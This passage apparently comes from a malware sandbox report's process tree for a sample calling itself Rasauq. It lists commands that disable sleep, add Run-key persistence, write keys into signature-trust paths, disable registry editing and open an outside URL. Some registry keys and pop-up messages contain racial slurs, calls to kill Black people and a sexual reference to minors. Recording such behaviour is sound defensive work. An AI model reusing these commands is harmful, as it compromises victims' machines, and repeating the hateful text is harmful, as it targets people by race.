- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
PID:5064
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:1504
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:1728
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
PID:1592
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
PID:700
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵PID:4780
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵PID:5072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
PID:772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵PID:2984
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵PID:2120
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2936
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3792
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:1288
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2552
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4352
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5940
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1032
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1824
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5376
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1108
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f4⤵PID:6016
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f4⤵PID:5492
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵PID:4644
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵PID:5248
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:5208
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:3936
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:2112
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5760
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵PID:2328
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:2752
-
-
C:\Windows\system32\reg.exereg add "End of search: 20 match(es) found.\Software\Rasauq on top" /f4⤵PID:4056
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵PID:3896
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:1600
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
PID:3344
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4852
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4812
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:404
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3920
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1232 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x308,0x7fffd100f208,0x7fffd100f214,0x7fffd100f2205⤵PID:4104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:115⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:25⤵PID:4532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2372,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:135⤵PID:3672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3368,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=3432 /prefetch:15⤵PID:4484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3376,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=3440 /prefetch:15⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4120,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=4836 /prefetch:15⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4996,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:15⤵PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5184,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:15⤵PID:3008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5332,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:15⤵PID:4108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5552,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:15⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=3444,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:15⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5768,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5572 /prefetch:15⤵PID:2092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6080,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:15⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6256,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6260 /prefetch:15⤵PID:5748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6376,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6420 /prefetch:15⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6592,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=4708 /prefetch:15⤵PID:2404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6752,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:15⤵PID:3708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6400,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6928 /prefetch:15⤵PID:2688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7104,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:15⤵PID:1680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7248,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:15⤵PID:3284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=7448,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7460 /prefetch:15⤵PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7436,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7612 /prefetch:15⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7752,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7812 /prefetch:15⤵PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=8116,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8132 /prefetch:15⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7156,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8320 /prefetch:15⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8476,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8480 /prefetch:15⤵PID:244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8632,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8640 /prefetch:15⤵PID:5060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8916,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:15⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=8620,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9100 /prefetch:15⤵PID:2300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9068,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9292 /prefetch:15⤵PID:1272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9460,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9476 /prefetch:15⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9660,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9668 /prefetch:15⤵PID:3664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9472,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9624 /prefetch:15⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=10020,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10048 /prefetch:15⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10212,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10252 /prefetch:15⤵PID:6380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10408,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10400 /prefetch:15⤵PID:6744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10608,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10628 /prefetch:15⤵PID:6980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=10624,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10872 /prefetch:15⤵PID:6256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11084,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10612 /prefetch:15⤵PID:6628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11224,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11276 /prefetch:15⤵PID:6752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11052,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11432 /prefetch:15⤵PID:6240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11424,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11664 /prefetch:15⤵PID:6828
-
-
